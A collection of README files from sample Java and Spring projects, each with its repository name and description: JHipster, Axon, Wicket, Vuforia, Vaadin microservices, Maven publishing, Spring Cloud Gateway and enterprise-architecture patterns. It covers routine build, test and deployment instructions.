for Leaflet that we won't detail here. For further instructions on how to develop with JHipster, have a look at [Using JHipster in development][]. ### Using angular-cli You can also use [Angular CLI][] to generate some custom client code. For example, the following command: ng generate component my-component will generate few files: create src/main/webapp/app/my-component/my-component.component.html create src/main/webapp/app/my-component/my-component.component.ts update src/main/webapp/app/app.module.ts ## Building for production To optimize the jhipsterSampleApplicationNG2 application for production, run: ./mvnw -Pprod clean package This will concatenate and minify the client CSS and JavaScript files. It will also modify `index.html` so it references these new files. To ensure everything worked, run: java -jar target/*.war Then navigate to [http://localhost:8080](http://localhost:8080) in your browser. Refer to [Using JHipster in production][] for more details. ## Testing To launch your application's tests, run: ./mvnw clean test ### Client tests Unit tests are run by [Karma][] and written with [Jasmine][]. They're located in [src/test/javascript/](src/test/javascript/) and can be run with: yarn test UI end-to-end tests are powered by [Protractor][], which is built on top of WebDriverJS. They're located in [src/test/javascript/e2e](src/test/javascript/e2e) and can be run by starting Spring Boot in one terminal (`./mvnw spring-boot:run`) and running the tests (`yarn run e2e`) in a second one. ### Other tests Performance tests are run by [Gatling][] and written in Scala. They're located in [src/test/gatling](src/test/gatling) and can be run with: ./mvnw gatling:execute For more information, refer to the [Running tests page][]. ## Using Docker to simplify development (optional) You can use Docker to improve your JHipster development experience. A number of docker-compose configuration are available in the [src/main/docker](src/main/docker) folder to launch required third party services. For example, to start a mysql database in a docker container, run: docker-compose -f src/main/docker/mysql.yml up -d To stop it and remove the container, run: docker-compose -f src/main/docker/mysql.yml down You can also fully dockerize your application and all the services that it depends on. To achieve this, first build a docker image of your app by running: ./mvnw verify -Pprod dockerfile:build Then run: docker-compose -f src/main/docker/app.yml up -d For more information refer to [Using Docker and Docker-Compose][], this page also contains information on the docker-compose sub-generator (`jhipster docker-compose`), which is able to generate docker configurations for one or several JHipster applications. ## Continuous Integration (optional) To configure CI for your project, run the ci-cd sub-generator (`jhipster ci-cd`), this will let you generate configuration files for a number of Continuous Integration systems. Consult the [Setting up Continuous Integration][] page for more information. [JHipster Homepage and latest documentation]: http://www.jhipster.tech [JHipster 4.12.0 archive]: http://www.jhipster.tech/documentation-archive/v4.12.0 [Using JHipster in development]: http://www.jhipster.tech/documentation-archive/v4.12.0/development/ [Using Docker and Docker-Compose]: http://www.jhipster.tech/documentation-archive/v4.12.0/docker-compose [Using JHipster in production]: http://www.jhipster.tech/documentation-archive/v4.12.0/production/ [Running tests page]: http://www.jhipster.tech/documentation-archive/v4.12.0/running-tests/ [Setting up Continuous Integration]: http://www.jhipster.tech/documentation-archive/v4.12.0/setting-up-ci/ [Gatling]: http://gatling.io/ [Node.js]: https://nodejs.org/ [Yarn]: https://yarnpkg.org/ [Webpack]: https://webpack.github.io/ [Angular CLI]: https://cli.angular.io/ [BrowserSync]: http://www.browsersync.io/ [Karma]: http://karma-runner.github.io/ [Jasmine]: http://jasmine.github.io/2.0/introduction.html [Protractor]: https://angular.github.io/protractor/ [Leaflet]: http://leafletjs.com/ [DefinitelyTyped]: http://definitelytyped.org/
1
smcvb/gamerental
Sample project for a Game Rental application as a showcase for Axon
axon axon-framework cqrs ddd event-sourcing
# Game Rental Application ## Description The "Game Rental" application showcases how [Axon Framework](https://github.com/AxonFramework/AxonFramework) and [Axon Server](https://developer.axoniq.io/axon-server/overview) or [AxonIQ Cloud](https://cloud.axoniq.io/) can be used during software development. The domain focused on is that of rental services from the perspective of a video game store. This repository provides just such an application, albeit a demo rather than a full-fledged solution. It serves the personal purpose of having a stepping stone application to live code during presentations. I intend to build upon this sample during consecutive talks, further enhancing its capabilities as time progresses. For others, I hope this provides a quick and straightforward look into what it means to build an Axon-based application. Due to its nature of being based on Axon, it incorporates [DDD](https://developer.axoniq.io/domain-driven-design/overview), [CQRS](https://developer.axoniq.io/cqrs/overview), [Event Sourcing](https://developer.axoniq.io/event-sourcing/overview), and an overall message-driven solution to communicate between distinct components. > **Demo Recordings with different Game Rental implementations** > > Since I aim to use this project for some time, it'll change through its lifecycle. > Most notably, I'll keep it up to date with recent versions of the dependencies. > > Due to this, recordings from previous iterations of this project will likely show slight deviations. > However, the taken steps during those recordings will remain intact. ## Project Traversal Distinct branches will be (made) available per public speaking, sharing a start and final solution branch separately. Additionally, several branches representing the steps throughout the lifecycle of the "Game Rental" application will be present, allowing you to: * Check out the exact step that interest you. * Perform a `git reset --hard step#` to reset your current branch. Next to providing the convenience of showing the flow, it also serves as a backup during the presentation. This project currently contains the following steps: 1. The `core-api`, containing the commands, events, queries, and query responses. 2. The `command` model has been created, showing a `Game` aggregate. 3. The application connects to [AxonIQ Console](https://console.axoniq.io/) and [AxonIQ Cloud](https://console.cloud.axoniq.io/) through the added AxonIQ Console and [Axon Server](https://developer.axoniq.io/axon-server/overview) properties in the `application.properties`. 4. The `query` model, a `GameView`, is provided, created/updated, and made queryable through the `GameCatalogProjector`. 5. This step includes the [Reactor Extension](https://github.com/AxonFramework/extension-reactor), which is used by the `GameRentalController`. 6. This step introduces cleaner distributed exceptional handling. It does so by throwing specifics exceptions in `@ExceptionHandler` annotated functions in the `Game` aggregate and `GameCatalogProjector`, containing an `ExceptionStatusCode`. 7. Spring's `@Profile{{profile-name})` annotation has been added to the `Game`, `GameCatalogProjector`, `GameViewRepository` and `GameRentalController`, allowing for application distribution. 8. Preparation to introduce another endpoint based on RSocket, by renaming the controller to contain "rest" in the name and by extracting the exception mapping registration. 9. Introduce the `GameRentalRSocketController`, providing an entry point to the application using [RSocket](https://rsocket.io/). 10. Add the "reservations" query end, invoking a `ReservationService` once a game is returned. Since this service only has a flunky implementation, attach a [dead-letter queue](https://docs.axoniq.io/reference-guide/axon-framework/events/event-processors#dead-letter-queue) to the `reservations` processing group to deal with errors. ## Running and testing the application As this is a Spring Boot application, simply running the `GameRentalApplication` is sufficient. However, Spring profiles are present, which allow for running portions of this application. More specifically, there's a `command`, `query`, `ui`, `rsocket`, and `reservations` profile present, thus separating the `Game` aggregate, `GameCatalogProjector`, `GameRentalRestController`, `GameRentalRSocketController`, and reservation specifics components into distinct groups. Furthermore, when you use IntelliJ, you can use the "Run Configurations" from the `./.run` to speed up the startup process. The application does expect it can make a connection with an Axon Server instance. Ideally, [Axon Cloud](https://console.cloud.axoniq.io/) is used for this, as is shown in step 3. If you desire to run Axon Server locally, you can download it [here](http://download.axoniq.io/quickstart/AxonQuickstart.zip). > **Unit Tests** > > Any new components introduced in a step include unit tests. > These can be used to better understand the project. For validating the application's internals, you can run the tests, use the REST endpoint, or connect with the [RSocket](https://rsocket.io/) endpoint. When testing through the REST endpoint, [IntelliJ Ultimate](https://www.jetbrains.com/help/idea/http-client-in-product-code-editor.html) you can use the included `.http` files (in the `http-requests` folder of this project). The `1-register-games.http` allows for the registration of several games to build a base catalog. The `2-rent-return-find.http` file contains rent, return, and find operations for testing. The `3-bulk-rent-return.http` file contains a bulk of rent and return operations for a single game to test bulk. The `4-dead-letter-management.http` file contains the endpoint to process dead-letters. When testing through RSocket, the most straightforward approach is to install the [RSocket Client CLI](https://github.com/making/rsc), or `rsc` for short. The README of `rsc` provides concrete explanations on how to install it in your environment. With `rsc` in place, you can use the following commands to test the application: * Register a game - `rsc --debug --request --route register --data="{\"gameIdentifier\":\"8668\",\"title\":\"Hades\",\"releaseDate\":\"2020-09-17T00:00:01.000009Z\",\"description\":\"Roguelike dungeon crawler set in ancient Greek mythology\",\"singleplayer\":true,\"multiplayer\":false}" tcp://localhost:7000` * Rent a game - `rsc --debug --fnf --route rent --data="{\"gameIdentifier\":\"8668\",\"renter\":\"Ben Wilcock\"}" tcp://localhost:7000` * Return a game - `rsc --debug --fnf --route return --data="{\"gameIdentifier\":\"8668\",\"renter\":\"Ben Wilcock\"}" tcp://localhost:7000` * Find a game - `rsc --debug --request --route find --data="8668" tcp://localhost:7000` * Watch the game catalog - `rsc --debug --stream --route catalog tcp://localhost:7000` ## Starting your own Axon project The [steps](#project-traversal) this project traverses show a common approach towards constructing an Axon application. If you want to begin from scratch, consider these key aspects: * Use the [AxonIQ Initializr](https://start.axoniq.io/) to kick-start your project. * Use [Axon Cloud Console](https://console.cloud.axoniq.io/) to connect your application to a context. Using Axon Cloud allows you to persist your events and distribute commands, events, and queries. * If you want a longer learning experience, please take a look at the [AxonIQ Academy](https://academy.axoniq.io/). * Whenever anything is unclear, check out the [Reference Guide](https://docs.axoniq.io/reference-guide/) or drop a question on the [forum](https://discuss.axoniq.io/).
1
kinabalu/mysticpaste
A sample pastebin built using the Apache Wicket java web framework
null
# Overview This pastebin was built using Apache Wicket. The original code was built by several folks as a tutorial for learning Wicket named 5 Days of Wicket. There's a link in the navigation to the source code which you can peruse at your leisure. The idea of a pastebin is simple, copy all or a fragment of code you need help with into the content box on the page. Select which language the code is in for nice syntax highlighting provided by the SyntaxHighlighter JavaScript library. You will receive a small URL to paste into an email, IRC, mailing list, or instant message to receive help on your issue. We have plugins for 4 different development environments so you can paste directly from the editor. ## Environment Configuration ### The Mystic bits Mystic Paste is setup with Maven so to build a war, just type `mvn package -Dmaven.test.skip=true` Pull it into any IDE and find the Start.java in `web/src/test/java/com/mysticcoders` Execute the main and you should have a pastebin running. ## Deploying Deployment should be as simple as adding your own `filters-DEV.properties` and then typing : `mvn package -Dmaven.test.skip=true -PDEV`
1
daemontus/VuforiaTransparentVideo
Sample app that can render transparent video using augmented reality framework Vuforia.
null
Vuforia Transparent Video ======================= Hi, this is an example project that shows how to use Vuforia augmented reality framework to display video with transparency, such as the one shown in the screenshot. For more info, read this article: http://treeset.wordpress.com/2014/03/29/chroma-keying-with-vuforia-a-k-a-transparent-video/ ##### Using older version of Vuforia? Try this branch: [Old](https://github.com/daemontus/VuforiaTransparentVideo/tree/old) ![Transparent Video Example](https://treeset.files.wordpress.com/2014/03/screenshot_2016-06-12-14-15-55.png)
1
khauser/microservices4vaadin
Sample application to show the secured integration of microservices and vaadin
authserver docker eventstore gradle microservice oauth2 rancher redis service-discovery spring-session sso vaadin
# microservices4vaadin ![CircleCI](https://circleci.com/gh/khauser/microservices4vaadin.png?style=shield&circle-token=e56d14269e12d73dcc8b45b8dad847985d4e20fb) [![Coverage Status](https://coveralls.io/repos/github/khauser/microservices4vaadin/badge.svg?branch=master)](https://coveralls.io/github/khauser/microservices4vaadin?branch=master) Exemplary application to show the SSO and OAuth2 secured integration of microservices with Spring Cloud and Vaadin. Main concepts in this projects are: * Microservices ("Software that Fits in Your Head") * Secured Gateway (SSO and OAuth2) * Service Discovery * Circuit Breaking * Shared Session overall Services * Event store to fulfill CQRS principles ## Architecture: ![Architecture](/doc/Architecture.png) * **Authserver**: * Authentification and authorization service * Allows user login and also user registration via REST * Generates spring session (persisted in Redis) which also holds the security context * **Configserver** * Centralized configuration of each service * **Edge**: * SSO Gateway to Frontend and also directly to the Backend * UI for the landing page, the login and the registration panels * Gets the security context and the user data from spring session * **Eventstore**: * Distribute events across microservices via RabbitMQ and persist them in MongoDB * **Frontend**: * Vaadin frontend with some simple but responsive UI * Load balanced (Ribbon) access to backend * Gets user data from spring session * **UserService**: * Represents the user domain * **Backend**: * Simple but secured REST resource as backend for the frontend * **Discovery**: service discovery with eureka * **Turbine**+**Hystrixdashboard**: use hystrix as circuit breaker ToDo: * add a backend service ## Main frameworks: * Spring: [Boot] (http://projects.spring.io/spring-boot/), [Data JPA] (http://projects.spring.io/spring-data-jpa), [Session] (http://projects.spring.io/spring-session), [Cloud Security] (http://cloud.spring.io/spring-cloud-security) * [Vaadin] (https://www.vaadin.com/) * Netflix: [Zuul] (https://github.com/Netflix/zuul), [Eureka] (https://github.com/Netflix/eureka), [Hystrix] (https://github.com/Netflix/Hystrix) * [AxonFramwork] (http://www.axonframework.org/) * [Rancher] (http://rancher.com/) ## Installation: * install JDK 8 * install Redis+RabbitMQ+MongoDB+MySQL (you can also use the [docker-compose.yml](docker-compose.yml) file * Run `gradlew clean build` to compile and build the application * Run `start-all.bat` to start the list of services * `http://localhost` should bring you to the landing page (with a redirect to https) ## Development: * Git, Eclipse with Gradle IDE (Buildship), and [lombok] (https://projectlombok.org/) ### Set up project: * checkout git repository * run `docker-compose up -d` do start dependent Redis, RabbitMQ, MongoDB and MySQL services (also DBs will be added automatically) * `gradlew clean build` to compile project * run `start-all.bat` in windows or `start-all.sh` in unix ##Deployment: * The project could be deployed to a rancher stack using the given `rancher-docker-compose.yml`. The databases from above also here need to be added manually, here within the execute shell of the MySQL-container. ![Rancher stack](/doc/rancher_stack_graph.png) * If all works fine (services might need to be restarted) you should see the this landing page: ![Landing page](/doc/landing_page.png) Initial test credentials then are `ttester@test.de/quert6`. * Fingers crossed.. Finally the Vaadin UI should show up: ![Vaadin UI](/doc/vaadin_ui.png)
1
michaelliao/how-to-become-rich
A sample Maven repo that makes you rich.
null
# How to Become Rich This is a tutorial about how to publish a Maven artifact to GitHub: https://www.liaoxuefeng.com/wiki/1252599548343744/1347981037010977 ### Usage Add the following to `pom.xml`: ``` <project ...> ... <repositories> <repository> <id>github-rich-repo</id> <name>The Rich Repository on Github</name> <url>https://michaelliao.github.io/how-to-become-rich/maven-repo/</url> </repository> </repositories> <dependencies> <dependency> <groupId>com.itranswarp.rich</groupId> <artifactId>how-to-become-rich</artifactId> <version>1.0.0</version> </dependency> </dependencies> ... </project> ``` ### Sample code ``` Millionaire millionaire = new Millionaire(); System.out.println(millionaire.howToBecomeRich()); ```
1
spring-cloud-services-samples/animal-rescue
A sample application that demonstrates the usage of Spring Cloud Gateway for VMware Tanzu or Spring Cloud Gateway for Kubernetes.
null
# Animal Rescue ![Test All](https://github.com/spring-cloud-services-samples/animal-rescue/workflows/Test%20All/badge.svg?branch=master) Sample app for VMware's Spring Cloud Gateway commercial products. Features we demonstrate with this sample app: - Routing traffic to configured internal routes with container-to-container network - Gateway routes configured through service bindings - Simplified route configuration - SSO login and token relay on behalf of the routed services - Required scopes on routes (tag: `require-sso-scopes`) - Circuit breaker filter - OpenAPI route conversion - OpenAPI auto generation ![architecture](./docs/images/animal-rescue-arch.png) ## Table of Contents * [Deploy to Kubernetes](#deploy-to-kubernetes) * [Deploy to Tanzu Application Service](#deploy-to-tanzu-application-service) * [Special frontend config related to gateway](#special-frontend-config-related-to-gateway) * [Gateway and Animal Rescue application features](#gateway-and-animal-rescue-application-features) * [OpenAPI Generation and Route Conversion](#openapi-generation-and-route-conversion-features) * [Development](#development) ## Deploy to Kubernetes The Kubernetes deployment requires you to install [kustomize](https://kustomize.io/). You will also need to install [Spring Cloud Gateway for Kubernetes](https://network.pivotal.io/products/spring-cloud-gateway-for-kubernetes) successfully onto your target Kubernetes cluster. ### Configure Single Sign-On (SSO) For information configuring Okta as the SSO provider, see [go here](https://docs.vmware.com/en/VMware-Spring-Cloud-Gateway-for-Kubernetes/2.0/scg-k8s/GUID-guides-sso-okta-tutorial.html). For Animal Rescue sample Single Sign-On (SSO) to work, you will need to create two text files that will be used to create Kubernetes secrets: * ./backend/secrets/sso-credentials.txt * ./gateway/sso-secret-for-gateway/secrets/test-sso-credentials.txt Before you start, and for validation, please locate the JWKS endpoint info from your SSO identity provider. The endpoint typically exists at: ``` https://YOUR_DOMAIN/.well-known/openid-configuration ``` For example, when using Okta the configured Issuer URI and JWKS URI can be retrieved at: ``` https://<issuer-uri>/.well-known/openid-configuration $ curl https://dev-1234567.okta.com/oauth2/abcd12345/.well-known/openid-configuration { "issuer": "https://dev-1234567.okta.com/oauth2/abcd12345", ... "jwk-set-uri": "https://dev-1234567.okta.com/oauth2/abcd12345/v1/keys", .... # Please note that the format used by Okta is jwk-set-uri="<issuer-uri>/v1/keys" ``` The contents of the `./backend/secrets/sso-credentials.txt` file for example would be the following: ``` jwk-set-uri=https://dev-1234567.okta.com/oauth2/abcd12345/v1/keys ``` The contents of the `./gateway/sso-secret-for-gateway/secrets/test-sso-credentials.txt` file includes the following values from your OpenID Connect (OIDC) compliant SSO identity provider: ``` scope=openid,profile,email client-id={your_client_id} client-secret={your_client_secret} issuer-uri={your_issuer_uri} ``` ### Configure Ingress The K8s deploy leverages an Ingress object to easily expose your application outside of the cluster. Before starting, confirm that you have an ingress controller installed into your cluster. [Contour](https://projectcontour.io/) is a good choice if you don't already have a favorite. Next, edit `gateway/gateway-demo.yaml` to set the domain to your domain. If you don't have a domain that you can use, leveraging [`nip.io`](https://nip.io/) is a good choice. **Important** Once you have your domain, remember to configure it as an accepted `redirect_uri` in your SSO provider. Otherwise, application login will fail. ### Deploy with Kustomize (recommended) Assuming you are authenticated onto target Kubernetes cluster, you can run the following command from top-level directory in the repository: ```bash kustomize build . | kubectl apply -f - ``` This will create a namespace named `animal-rescue`, create a new gateway instance named `gateway-demo` in that namespace, deploy the frontend and backend Animal Rescue applications and finally apply the application specific API route configurations to `gateway-demo`. ### Deploy with Kubectl If you don't want to use `kustomize`, you can apply each yaml file in the [`kustomization.yaml`](kustomization.yaml) file manually into the `animal-rescue` namespace (or any namespace you prefer) as well as create the `sso-credentials` secret from `backend/secrets/sso-credentials.txt` and `animal-rescue-sso` secret from `gateway/sso-secret-for-gateway/secrets/test-sso-credentials.txt`. Make sure to create the SSO credentials secret in the SCG installation namespace (`spring-cloud-gateway` by default). The gateway instance created, named `gateway-demo`, doesn't have any API routes defined initially. Once the API route definitions defined in a `SpringCloudGatewayRouteConfig` objects are mapped to `gateway-demo` using the `SpringCloudGatewayMapping` objects, you will see the routes added to the gateway. ### Accessing Animal Rescue Site After deploying Animal Rescue, there will be an Ingress created. You can then access Animal Rescue at the URL set by the Ingress created in `gateway/gateway-demo.yaml`. For example, `http://animal-rescue.my.domain.io/rescue`. ## Deploy to Tanzu Application Service Run the following scripts to set up everything: ```bash ./scripts/cf_deploy init # installs dependencies and builds the deployment artifact ./scripts/cf_deploy deploy # handles everything you need to deploy the frontend, backend, and gateway. This script can be executed repeatedly to deploy new changes. ``` Then visit the frontend url `https://gateway-demo.${appsDomain}/rescue` to view the sample app. Once you have enough fun with the sample app, run the following script to clean up the environment: ```bash ./scripts/cf_deploy destroy # tears down everything ``` Some other commands that might be helpful: ```bash ./scripts/cf_deploy push # builds and pushes frontend and backend ./scripts/cf_deploy dynamic_route_config_update # update bound apps' configuration with calling the update endpoint on the backing app. You will need to be a space developer to do so. ./scripts/cf_deploy rebind # unbinds and rebinds frontend and backend ./scripts/cf_deploy upgrade # upgrade the gateway instance ``` All the gateway configuration can be found and updated here: - Gateway service instance configuration file used on create/update: `./api-gateway-config.json` - Frontend routes configuration used on binding used on bind: `./frontend/api-route-config.json` - Backend routes configuration used on binding used on bind:`./backend/api-route-config.json` ## Special frontend config related to gateway The frontend application is implemented in ReactJS, and is pushed with static buildpack. Because of it's static nature, we had to do the following: 1. `homepage` in `package.json` is set to `/rescue`, which is the path we set for the frontend application in gateway config (`frontend/api-route-config.json`). This is to make sure all related assets is requested under `/rescue` path as well. 1. `Sign in to adopt` button is linked to `/rescue/login`, which is a path that is `sso-enabled` in gateway config (`frontend/api-route-config.json`). This is necessary for frontend apps bound to a sub path on gateway because the Oauth2 login flow redirects users to the original requested location or back to `/` if no saved request exists. This setting is not necessary if the frontend app is bound to path `/`. 1. `REACT_APP_BACKEND_BASE_URI` is set to `/backend` in build script, which is the path we set for the backend application in gateway config (`backend/api-route-config.json`). This is to make sure all our backend API calls are appended with the `backend` path. ## Gateway and Animal Rescue application features Visit `https://gateway-demo.${appsDomain}/rescue`, you should see cute animal bios with the `Adopt` buttons disabled. All the information are fetched from a public `GET` backend endpoint `/animals`. ![homepage](./docs/images/homepage.png) Click the `Sign in to adopt` button in the top right corner, you should be redirected to the SSO login page if you haven't already logged in to SSO. ![log in page](./docs/images/login.png) Once you logged in, you should see a greeting message regarding the username you log in with in the top right corner, and the `Adopt` buttons should be enabled. ![logged in view](./docs/images/logged-in.png) Click on the `Adopt` button, input your contact email and application notes in the model, then click `Apply`, a `POST` request should be sent to a `sso-enabled` backend endpoint `/animals/{id}/adoption-requests`, with the adopter set to your username we parsed from your token. ![adopt model](./docs/images/adopt.png) Then the model should close, and you should see the `Adopt` button you clicked just now has turned into `Edit Adoption Request`. This is matched by your SSO log in username. ![adopted view](./docs/images/adopted.png) Click on the `Edit Adoption Request` again, you can view, edit (`PUT`), and delete (`DELETE`) the existing request. ![view or edit existing adoption request model](./docs/images/edit-or-delete.png) **Note** Documentation may get out of date. Please refer to the [e2e test](./e2e/cypress/integration/) and the test output video for the most accurate user flow description. To see circuit breaker filter in action, stop `animal-rescue-frontend` application and refresh page. You should see a response from `https://example.org` web-site, this is configured in `api-route-config.json` file in `/fallback` route. ## OpenAPI Generation and Route conversion features ### Route Conversion The Spring Cloud Gateway Operator offers an OpenAPI Route Conversion Service that can be used to automate the creation of a `SpringCloudGatewayRouteConfig` based off an OpenAPI document (v2 or v3), The full details of this service can be [found here](https://docs.vmware.com/en/VMware-Spring-Cloud-Gateway-for-Kubernetes/2.1/scg-k8s/GUID-guides-openapi-route-conversion.html), but you fill find an example below of how it was used in animal rescue. The animal rescue backend exposes an OpenAPI v3 document at `/api-docs`, which is auto generated using the [springdoc](https://springdoc.org/) library. The `SpringCloudGatewayRouteConfig` for the animal rescue backend, which can be found in `/backend/k8s/animal-rescue-backend-route-config.json` was generated using the OpenAPI Route Conversion Service by pointing it to that OpenAPI document. The full command that was used to generate it can be found below. **Note:** In the example the Spring Cloud Gateway Operator pod has been port forwarded to port 5566. ```commandline curl --request POST 'http://localhost:5566/api/convert/openapi' \ --header 'Content-Type: application/json' \ --data-raw '{ "service": { "namespace": "animal-rescue", "name": "animal-rescue-backend", "ssoEnabled": true, "filters": ["RateLimit=10,2s"] }, "openapi": { "location": "/api-docs" }, "routes": [ { "predicates": ["Method=GET","Path=/animals"], "filters": [], "ssoEnabled": false }, { "predicates": ["Method=GET,PUT,POST,DELETE","Path=/**"], "filters": [], "tokenRelay": true }, { "predicates": ["Method=GET,PUT,PATCH,POST,DELETE","Path=/actuator/**"], "filters": [], "ssoEnabled": false } ] }' | sed 's/Path=/Path=\/api/g' \ | sed 's/"animal-rescue-backend"/"animal-rescue-backend-route-config"/' ``` The full details of how the service works can be [found here](https://docs.vmware.com/en/VMware-Spring-Cloud-Gateway-for-Kubernetes/2.1/scg-k8s/GUID-guides-openapi-route-conversion.html), but below you will find a brief summary of what the above command does. - Specifies the namespace/name of the service that fronts the animal rescue backend provide the path to the OpenAPI document. - Specifies some filters at the service level that should be applied to all routes - Specifies some exceptions to the service level filters at the individual route level - i.e we turn off SSO for the endpoint that gets all animals as well as the actuator endpoints - We use sed to append the path '/api' to all the paths since that is how we want to expose the urls to the outside world. - Note that by default the operator will add a `StripPrefix=1` to every route which is why we don't explicitly have to add that filter here - We use sed to change the default name for the generated `SpringCloudGatewayRouteConfig`. By default, it will give it the name of the service, but for consistency with the other examples in this project we append "-route-config" to the name. ### OpenAPI Generation Spring Cloud Gateway for Kubernetes also offers a service to generate OpenAPI v3-compliant documentation for the gateways that it manages. When combined with the Route Conversion Service mentioned above this can be a powerful way to expose the details of your APIs their consumers. By default, the service will return an array of all the OpenAPI documents of the gateways it manages. There are options, however, to restrict the documents that are retrieved. The full details of this feature can be [found here](https://docs.vmware.com/en/VMware-Spring-Cloud-Gateway-for-Kubernetes/2.1/scg-k8s/GUID-guides-openapi-generation.html), but below you find some details on how it can be used with animal rescue. One option is to limit the results to a single OpenAPI document for a specific gateway. You can do this by using the **namespace** and **name** of that gateway as part of the path. For example, if you are port forwarding the `scg-openapi-service` to port 5566 you could get the OpenAPI document specific to the `gateway-demo` with the following curl call: ```commandline curl http://localhost:5566/openapi/animal-rescue/gateway-demo ``` One thing you might notice with the call above is that the returned OpenAPI document only has routes for to the animal rescue backend, even though the `gateway-demo` also has `SpringCloudGatewayRouteDefinition` for the front end. (`frontend/k8s/animal-rescue-frontend-route-config.yaml`). The reason for this is that the OpenAPI Generation provides the ability to control which of your routes will show up in the generated document. In the case of the animal rescue, the OpenAPI generation is turned off for everything in the route config by setting `spec.openapi.generation.enabled=false` (see example below). You also have the ability to control it at the route level with `spec.routes.openapi.generation.enabled`. The full details can be [found here](https://docs.vmware.com/en/VMware-Spring-Cloud-Gateway-for-Kubernetes/2.1/scg-k8s/GUID-guides-openapi-generation.html) routes ```commandline spec: service: name: animal-rescue-frontend ssoEnabled: false openapi: generation: enabled: false ``` ## Development ### Run locally Use the following commands to manage the local lifecycle of animal-rescue: ```bash ./scripts/local.sh start # start auth server, frontend app, and backend app ./scripts/local.sh start --quiet # start everything without launching the app in browser, and redirects all output to `./scripts/out/` ./scripts/local.sh stop # stop auth server, frontend app, and backend app. You would only need to do this if you start the app in quiet mode. ``` ### Local security configuration Backend uses Form login for local development with two test accounts - `alice / test` and `bob / test`. Note that in a real deployment with Gateway, OAuth2 login will be managed by the gateway itself, and your app should use `TokenRelay` filter to receive OpenID ID Token in `Authorization` header. See `CloudFoundrySecurityConfiguration` class for an example of Spring Security 5 configuration to handle token relay correctly. > It is also possible to use OAuth2 login flow for the app. This requires running an authorization server locally. See `local-oauth2-flow` for an example of using Cloud Foundry User Account and Authentication (UAA) running in a Docker container locally. ### Tests Execute the following script to run all tests: ```bash ./scripts/local.sh init # install dependencies for the frontend folder and the e2e folder ./scripts/local.sh ci # run backend tests and e2e tests ./scripts/local.sh backend # run backend test only ./scripts/local.sh e2e --quiet # run e2e test only without interactive mode ``` You can find an e2e test output video showing the whole journey in `./e2e/cypress/videos/` after the test run. If you would like to launch the test in an actual browser and run e2e test interactively, you may run the following commands: ```bash ./scripts/local.sh start ./scripts/local.sh e2e ``` More detail about the e2e testing framework can be found at [cypress api doc](https://docs.cypress.io/api/api/table-of-contents.html) ### CI #### GitHub Actions GitHub Actions run all checks for the `main` branch and all PR requests. All workflow configuration can be found in `.github/workflows`. #### Concourse If you'd like to get the most updated sample app deployed in a real TAS environment, you can set up a concourse pipeline to do so: ```bash fly -t ${yourConcourseTeamName} set-pipeline -p sample-app-to-demo-environment -c concourse/pipeline.yml -l config.yml ``` You will need to update the Slack notification settings and add the following environment variables to your concourse credentials manager. Here are the variables we set in our concourse credhub: ``` - name: /concourse/main/sample-app-to-demo-environment/CF_API_HOST - name: /concourse/main/sample-app-to-demo-environment/CF_USERNAME - name: /concourse/main/sample-app-to-demo-environment/CF_PASSWORD - name: /concourse/main/sample-app-to-demo-environment/SKIP_SSL_VALIDATION - name: /concourse/main/sample-app-to-demo-environment/CF_ORG - name: /concourse/main/sample-app-to-demo-environment/CF_SPACE ``` ## Check out our tags Tags that looks like `SCG-VT-v${VERSION}+` indicates that this commit and the commits after are compatible with the specified `VERSION` of the `SCG-VT` tile. The other tags demonstrate different configuration with `SCG-VT`, have fun exploring what's possible!
1
jaysonzanarias/patterns-of-enterprise-application-architecture
Compilation of sample code from the book Patterns of Enterprise Application Architecture by Martin Fowler.
null
# Patterns of Enterprise Application Architecture Compilation of sample code from the book Patterns of Enterprise Application Architecture by Martin Fowler. I used and created this repo when I studied the book. Super worth reading it! Read the book and learn more on each topic. Enjoy! :) ## Layering - Presentation - Domain Logic - Data Source ## Patterns [Domain Logic Patterns](#DomainLogicPatterns) - Transaction Script - Domain Model - Table Module - Service Layer [Data Source Patterns](#DataSourcePatterns) - Table Data Gateway - Row Data Gateway - Active Records - Data Mapper [Object-Relational Behavior Patterns](#ObjectRelationalBehaviorPatterns) - Unit of Work - Identify Map - Lazy Load [Object-Relational Structural Patterns](#ObjectRelationalStructuralPatterns) - Identity Field - Foreign Key Mapping - Association Table Mapping - Dependent Mapping - Embedded Value - Serialized LOB - Single Table Inheritance - Class Table Inheritance - Concrete Table Inheritance - Inheritance Mappers [Object-Relational Metadata Mapping Patterns](#ObjectRelationalMetadataMappingPatterns) - Metadata Mapping - Query Object - Repository [Web Presentation Patterns](#WebPresentationPatterns) - Model View Controller - Page Controller - Front Controller - Template View - Transform View - Two Step View - Application Controller [Distribution Patterns](#DistributionPatterns) - Remote Facade - Data Transfer Object [Offline Concurrency Patterns](#OfflineConcurrencyPatterns) - Optimistic Offline Lock - Pessimistic Offline Lock - Coarse-Grained Lock - Implicit Lock [Session State Patterns](#SessionStatePatterns) - Client Session State - Server Session State - Database Session State [Base Patterns](#BasePatterns) - Gateway - Mapper - Layer Supertype - Separated Interface - Registry - Value Object - Money - Special Case - Plugin - Service Stub - Record Set ## Details <a name="DomainLogicPatterns"/> **Domain Logic Patterns** - Transaction Script > Organizes business logic by procedures where each procedure handles a single request from the presentation. <br>![Screenshot](images/TransactionScript.jpg) - Domain Model > An object model of the domain that incorporates both behavior and data. <br>![Screenshot](images/DomainModel.jpg) - Table Module > A single instance that handles the business logic for all rows in a database table or view. <br>![Screenshot](images/TableModule.jpg) - Service Layer > Defines an application’s boundary with a layer of services that establishes a set of available operations and coordinates the application’s response in each operation. <br>![Screenshot](images/ServiceLayer.png) <a name="DataSourcePatterns"/> **Data Source Patterns** - Table Data Gateway > An object that acts as a Gateway to a database table. One instance handles all the rows in the table. <br>![Screenshot](images/TableDataGateway.png) - Row Data Gateway > An object that acts as a Gateway to a single record in a data source. There is one instance per row. <br>![Screenshot](images/RowDataGateway.png) - Active Records > An object that wraps a row in a database table or view, encapsulates the database access, and adds domain logic on that data. <br>![Screenshot](images/ActiveRecords.png) - Data Mapper > A layer of Mappers (473) that moves data between objects and a database while keeping them independent of each other and the mapper itself. <br>![Screenshot](images/DataMapper.png) <a name="ObjectRelationalBehaviorPatterns"/> **Object-Relational Behavior Patterns** - Unit of Work > Maintains a list of objects affected by a business transaction and coordinates the writing out of changes and the resolution of concurrency problems. <br>![Screenshot](images/UnitOfWork.png) - Identify Map > Ensures that each object gets loaded only once by keeping every loaded object in a map. Looks up objects using the map when referring to them. <br>![Screenshot](images/IdentityMap.png) - Lazy Load > An object that doesn't contain all of the data you need but knows how to get it. <br>![Screenshot](images/LazyLoad.png) 